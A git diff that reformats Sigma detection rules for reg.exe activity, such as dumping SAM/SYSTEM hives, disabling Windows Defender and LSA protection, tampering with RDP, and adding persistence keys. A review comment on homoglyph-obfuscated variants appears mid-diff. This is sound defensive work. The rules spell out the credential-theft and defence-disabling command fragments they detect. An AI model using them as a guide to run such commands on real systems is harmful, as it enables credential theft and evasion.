+ - \software\Microsoft\Windows\CurrentVersion\Run # Also covers the strings "RunOnce", "RunOnceEx", "RunServices", "RunServicesOnce"
 - \software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
 - \software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
 - \software\Microsoft\Windows NT\CurrentVersion\Windows
@@ -35,8 +34,7 @@ fields:
 - CommandLine
 - ParentCommandLine
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reasons.
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
 - Legitimate administrator sets up autorun keys for legitimate reasons.
 - Discord
 level: medium
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml
index c53dd3734..b8cfc1f06 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml
@@ -1,8 +1,7 @@
 title: Security Service Disabled Via Reg.EXE
 id: 5e95028c-5229-4214-afae-d653d573d0ec
 status: test
-description: Detects execution of "reg.exe" to disable security services such as Windows
- Defender.
+description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
 references:
 - https://twitter.com/JohnLaTwC/status/1415295021041979392
 - https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1
@@ -23,14 +22,14 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_reg_add:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - reg
 - add
 selection_cli_reg_start:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - d 4
 - v Start
- CommandLine|contains:
+ CommandLine|contains:
 - \AppIDSvc
 - \MsMpSvc
 - \NisSrv
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml
index 95b0564e4..0503f2f0d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml
@@ -1,21 +1,19 @@
 title: Dumping of Sensitive Hives Via Reg.EXE
 id: fd877b94-9bb5-4191-bb25-d79cbd93c167
 related:
- - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e
- type: obsoletes
- - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0
- type: obsoletes
+ - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e
+ type: obsoletes
+ - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0
+ type: obsoletes
 status: test
-description: Detects the usage of "reg.exe" in order to dump sensitive registry hives.
- This includes SAM, SYSTEM and SECURITY hives.
+description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
 references:
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
 - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md
 - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
-author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community,
- frack113
+author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
 date: 2019/10/22
 modified: 2023/12/13
 tags:
@@ -33,32 +31,32 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: \reg.exe
+ - OriginalFileName: reg.exe
 selection_cli_flag:
- CommandLine|contains:
+ CommandLine|contains:
 - ' save '
 - ' export '
- - " \u02E2ave "
- - " e\u02E3port "
+ - ' ˢave '
+ - ' eˣport '
 selection_cli_hklm:
- CommandLine|contains:
+ CommandLine|contains:
 - hklm
- - "hk\u02EAm"
+ - hk˪m
 - hkey_local_machine
- - "hkey_\u02EAocal_machine"
- - "hkey_loca\u02EA_machine"
- - "hkey_\u02EAoca\u02EA_machine"
+ - hkey_˪ocal_machine
+ - hkey_loca˪_machine
+ - hkey_˪oca˪_machine
 selection_cli_hive:
- CommandLine|contains:
+ CommandLine|contains:
 - \system
 - \sam
 - \security
- - "\\\u02E2ystem"
- - "\\sy\u02E2tem"
- - "\\\u02E2y\u02E2tem"
- - "\\\u02E2am"
- - "\\\u02E2ecurity"
+ - \ˢystem
+ - \syˢtem
+ - \ˢyˢtem
+ - \ˢam
+ - \ˢecurity
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml
index 977fa3f74..3c0dbebb6 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml
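Review bot: The new `selection_cli_flag`, `selection_cli_hklm` and `selection_cli_hive` entries replace the `\u02E2`, `\u02E3` and `\u02EA` escapes with the literal modifier letters (`' ˢave '`, `hk˪m`, `\ˢystem`), so the obfuscation variants are now told apart from the plain `save`/`hklm`/`\system` entries only by glyph shape, and the match depends on the file being read and written as UTF-8 end to end. A transcoding step, an editor's Unicode normalization or a tool that strips non-ASCII would silently turn these into duplicates of the plain entries with no parse error to show for it. Since the escapes were the self-documenting form, the intent should at least be stated once above the list: `# Homoglyph variants (U+02E2, U+02E3, U+02EA) of the plain strings; see the command-line obfuscation reference`. Keeping the `\uXXXX` escapes inside double-quoted scalars would avoid the encoding dependency altogether.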
@@ -1,16 +1,10 @@
 title: Enumeration for Credentials in Registry
 id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1
 status: test
-description: 'Adversaries may search the Registry on compromised systems for insecurely
- stored credentials.
-
- The Windows Registry stores configuration information that can be used by the
- system or other programs.
-
- Adversaries may query the Registry looking for credentials and passwords that
- have been stored for use by other programs or services
-
- '
+description: |
+ Adversaries may search the Registry on compromised systems for insecurely stored credentials.
+ The Windows Registry stores configuration information that can be used by the system or other programs.
+ Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md
 author: frack113
@@ -29,19 +23,19 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 reg:
 Image|endswith: \reg.exe
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' query '
 - '/t '
 - REG_SZ
 - /s
 hive:
- - CommandLine|contains|all:
- - '/f '
- - HKLM
- - CommandLine|contains|all:
- - '/f '
- - HKCU
- - CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions
+ - CommandLine|contains|all:
+ - '/f '
+ - HKLM
+ - CommandLine|contains|all:
+ - '/f '
+ - HKCU
+ - CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions
 condition: process_creation and (reg and hive)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml
index 12db51944..5a5bf4874 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml
@@ -1,11 +1,10 @@
 title: Potential Suspicious Registry File Imported Via Reg.EXE
 id: 62e0298b-e994-4189-bc87-bc699aa62d97
 related:
- - id: 73bba97f-a82d-42ce-b315-9182e76c57b1
- type: derived
+ - id: 73bba97f-a82d-42ce-b315-9182e76c57b1
+ type: derived
 status: test
-description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe'
- utility
+description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
 references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import
 author: frack113, Nasreddine Bencherchali
@@ -23,12 +22,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: \reg.exe
+ - OriginalFileName: reg.exe
 selection_cli:
- CommandLine|contains: ' import '
+ CommandLine|contains: ' import '
 selection_paths:
- CommandLine|contains:
+ CommandLine|contains:
 - C:\Users\
 - '%temp%'
 - '%tmp%'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml
index 35a5b7c88..5259a86ae 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml
@@ -1,19 +1,13 @@
 title: RestrictedAdminMode Registry Value Tampering - ProcCreation
 id: 28ac00d6-22d9-4a3c-927f-bbd770104573
 related:
- - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2
- type: similar
+ - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 # Registry
+ type: similar
 status: test
-description: 'Detects changes to the "DisableRestrictedAdmin" registry value in order
- to disable or enable RestrictedAdmin mode.
-
- RestrictedAdmin mode prevents the transmission of reusable credentials to the
- remote system to which you connect using Remote Desktop.
-
- This prevents your credentials from being harvested during the initial connection
- process if the remote server has been compromise
-
- '
+description: |
+ Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+ RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+ This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md
 - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx
@@ -32,7 +26,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - \System\CurrentControlSet\Control\Lsa\
 - DisableRestrictedAdmin
 condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml
index 2810e3354..318c862a2 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml
@@ -1,8 +1,7 @@
 title: LSA PPL Protection Disabled Via Reg.EXE
 id: 8c0eca51-0f88-4db2-9183-fdfb10c703f9
 status: experimental
-description: Detects the usage of the "reg.exe" utility to disable PPL protection
- on the LSA process
+description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
 references:
 - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/
 author: Florian Roth (Nextron Systems)
@@ -20,11 +19,11 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: \reg.exe
+ - OriginalFileName: reg.exe
 selection_cli:
- CommandLine|contains: SYSTEM\CurrentControlSet\Control\Lsa
- CommandLine|contains|all:
+ CommandLine|contains: SYSTEM\CurrentControlSet\Control\Lsa
+ CommandLine|contains|all:
 - ' add '
 - ' /d 0'
 - ' /v RunAsPPL '
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_machineguid.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_machineguid.yml
index 30c54d612..fbbc59f01 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_machineguid.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_machineguid.yml
@@ -19,7 +19,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \reg.exe
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - SOFTWARE\Microsoft\Cryptography
 - '/v '
 - MachineGuid
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml
index daec44b07..356e976b4 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml
@@ -1,11 +1,10 @@
 title: Modify Group Policy Settings
 id: ada4b0c4-758b-46ac-9033-9004613a150d
 related:
- - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f
- type: similar
+ - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f
+ type: similar
 status: test
-description: Detect malicious GPO modifications can be used to implement many other
- malicious behaviors.
+description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md
 author: frack113
@@ -23,12 +22,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_reg:
- - Image|endswith: \reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: \reg.exe
+ - OriginalFileName: reg.exe
 selection_path:
- CommandLine|contains: \SOFTWARE\Policies\Microsoft\Windows\System
+ CommandLine|contains: \SOFTWARE\Policies\Microsoft\Windows\System
 selection_key:
- CommandLine|contains:
+ CommandLine|contains:
 - GroupPolicyRefreshTimeDC
 - GroupPolicyRefreshTimeOffsetDC
 - GroupPolicyRefreshTime
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml
index 199d420dd..2c39e2de2 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml
@@ -1,16 +1,12 @@
 title: Enable LM Hash Storage - ProcCreation
 id: 98dedfdd-8333-49d4-9f23-d7018cccae53
 related:
- - id: c420410f-c2d8-4010-856b-dffe21866437
- type: similar
+ - id: c420410f-c2d8-4010-856b-dffe21866437 # Registry
+ type: similar
 status: test
-description: 'Detects changes to the "NoLMHash" registry value in order to allow Windows
- to store LM Hashes.
-
- By setting this registry value to "0" (DWORD), Windows will be allowed to store
- a LAN manager hash of your password in Active Directory and local SAM databases.
-
- '
+description: |
+ Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+ By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
 references:
 - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
 - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password
@@ -30,7 +26,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - \System\CurrentControlSet\Control\Lsa
 - NoLMHash
 - ' 0'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_open_command.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_open_command.yml
index 8b77e98db..b837ad7d5 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_open_command.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_open_command.yml
@@ -1,8 +1,7 @@
 title: Suspicious Reg Add Open Command
 id: dd3ee8cc-f751-41c9-ba53-5a32ed47e563
 status: test
-description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry
- hives using DelegateExecute key
+description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
 references:
 - https://thedfirreport.com/2021/12/13/diavol-ransomware/
 author: frack113
@@ -20,21 +19,21 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - reg
 - add
 - hkcu\software\classes\ms-settings\shell\open\command
 - '/ve '
 - /d
 selection_2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - reg
 - add
 - hkcu\software\classes\ms-settings\shell\open\command
 - /v
 - DelegateExecute
 selection_3:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - reg
 - delete
 - hkcu\software\classes\ms-settings
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_query_registry.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_query_registry.yml
index eec82dc81..063feee86 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_query_registry.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_query_registry.yml
@@ -1,9 +1,7 @@
 title: Potential Configuration And Service Reconnaissance Via Reg.EXE
 id: 970007b7-ce32-49d0-a4a4-fbef016950bd
 status: test
-description: Detects the usage of "reg.exe" in order to query reconnaissance information
- from the registry. Adversaries may interact with the Windows registry to gather
- information about credentials, the system, configuration, and installed software.
+description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md
 author: Timur Zinniatullin, oscd.community
@@ -22,16 +20,16 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: \reg.exe
+ - OriginalFileName: reg.exe
 selection_flag:
- CommandLine|contains: query
+ CommandLine|contains: query
 selection_key:
- CommandLine|contains:
+ CommandLine|contains:
 - currentVersion\windows
 - winlogon\
 - currentVersion\shellServiceObjectDelayLoad
- - currentVersion\run
+ - currentVersion\run # Also covers the strings "RunOnce", "RunOnceEx" and "runServicesOnce"
 - currentVersion\policies\explorer\run
 - currentcontrolset\services
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml
index 38ed46724..573a11e06 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml
@@ -1,9 +1,7 @@
 title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE
 id: 0d5675be-bc88-4172-86d3-1e96a4476536
 status: test
-description: Detects the execution of "reg.exe" for enabling/disabling the RDP service
- on the host by tampering with the 'CurrentControlSet\Control\Terminal Server'
- values
+description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
 references:
 - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
 author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
@@ -23,20 +21,20 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_main_img:
- - Image|endswith: \reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: \reg.exe
+ - OriginalFileName: reg.exe
 selection_main_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' add '
 - \CurrentControlSet\Control\Terminal Server
 - REG_DWORD
 - ' /f'
 selection_values_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - Licensing Core
 - EnableConcurrentSessions
 selection_values_2:
- CommandLine|contains:
+ CommandLine|contains:
 - WinStations\RDP-Tcp
 - MaxInstanceCount
 - fEnableWinStation
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_screensaver.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_screensaver.yml
index fd870207e..9dfea592b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_screensaver.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_screensaver.yml
@@ -1,13 +1,9 @@
 title: Suspicious ScreenSave Change by Reg.exe
 id: 0fc35fc3-efe6-4898-8a37-0b233339524f
 status: test
-description: 'Adversaries may establish persistence by executing malicious content
- triggered by user inactivity.
-
- Screensavers are programs that execute after a configurable time of user inactivity
- and consist of Portable Executable (PE) files with a .scr file extension
-
- '
+description: |
+ Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+ Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md
 - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
@@ -27,29 +23,29 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_reg:
 Image|endswith: \reg.exe
- CommandLine|contains:
+ CommandLine|contains:
 - HKEY_CURRENT_USER\Control Panel\Desktop
 - HKCU\Control Panel\Desktop
- selection_option_1:
- CommandLine|contains|all:
+ selection_option_1: # /force Active ScreenSaveActive
+ CommandLine|contains|all:
 - /v ScreenSaveActive
 - /t REG_SZ
 - /d 1
 - /f
- selection_option_2:
- CommandLine|contains|all:
+ selection_option_2: # /force set ScreenSaveTimeout
+ CommandLine|contains|all:
 - /v ScreenSaveTimeout
 - /t REG_SZ
 - '/d '
 - /f
- selection_option_3:
- CommandLine|contains|all:
+ selection_option_3: # /force set ScreenSaverIsSecure
+ CommandLine|contains|all:
 - /v ScreenSaverIsSecure
 - /t REG_SZ
 - /d 0
 - /f
- selection_option_4:
- CommandLine|contains|all:
+ selection_option_4: # /force set a .scr
+ CommandLine|contains|all:
 - /v SCRNSAVE.EXE
 - /t REG_SZ
 - '/d '
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml
index b5244377e..cabe56c49 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml
@@ -1,16 +1,10 @@ title: Changing Existing Service ImagePath Value Via Reg.EXE id: 9b0b7ac3-6223-47aa-a3fd-e8f211e637db status: test -description: 'Adversaries may execute their own malicious payloads by hijacking the - Registry entries used by services. - - Adversaries may use flaws in the permissions for registry to redirect from the - originally specified executable to one that they control, in order to launch their - own code at Service start. - +description: | + Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. + Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe author: frack113 @@ -29,12 +23,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \reg.exe - CommandLine|contains|all: + CommandLine|contains|all: - 'add ' - SYSTEM\CurrentControlSet\Services\ - ' ImagePath ' selection_value: - CommandLine|contains: + CommandLine|contains: - ' /d ' - ' -d ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml index 00851c7c7..f5880941b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml 
@@ -1,15 +1,13 @@ title: Detected Windows Software Discovery id: e13f668e-7f95-443d-98d2-1816a7648a7b related: - - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 - type: derived + - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 + type: derived status: test -description: Adversaries may attempt to enumerate software for a variety of reasons, - such as figuring out what security measures are present or if the compromised - system has a version of software that is vulnerable. +description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md - - https://github.com/harleyQu1nn/AggressorScripts + - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna author: Nikita Nazarov, oscd.community date: 2020/10/16 modified: 2022/10/09 @@ -25,8 +23,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - Image|endswith: \reg.exe - CommandLine|contains|all: + Image|endswith: \reg.exe # Example: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion + CommandLine|contains|all: - query - \software\ - /v diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml index eb38e559a..cad97da89 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml 
@@ -1,8 +1,7 @@ title: Reg Add Suspicious Paths id: b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 status: test -description: Detects when an adversary uses the reg.exe utility to add or modify new - keys or subkeys +description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md @@ -23,10 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_path: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious registry locations below - \AppDataLow\Software\Microsoft\ - \Policies\Microsoft\Windows\OOBE - \Policies\Microsoft\Windows NT\CurrentVersion\Winlogon diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml index 8f65affe7..2446659f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \Services\VSS\Diag - /d Disabled condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml index b1e7ff496..5e12f8887 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml 
@@ -1,15 +1,12 @@ title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE id: 452bce90-6fb0-43cc-97a5-affc283139b3 status: experimental -description: Detects the usage of "reg.exe" to tamper with different Windows Defender - registry keys in order to disable some important features related to protection - and detection +description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ - https://github.com/swagkarna/Defeat-Defender-V1.2.0 - https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2 -author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2022/03/22 modified: 2023/06/05 tags: @@ -24,18 +21,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_root_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_root_path: - CommandLine|contains: + CommandLine|contains: - SOFTWARE\Microsoft\Windows Defender\ - SOFTWARE\Policies\Microsoft\Windows Defender Security Center - SOFTWARE\Policies\Microsoft\Windows Defender\ selection_dword_0: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - d 0 - CommandLine|contains: + CommandLine|contains: - DisallowExploitProtectionOverride - EnableControlledFolderAccess - MpEnablePus 
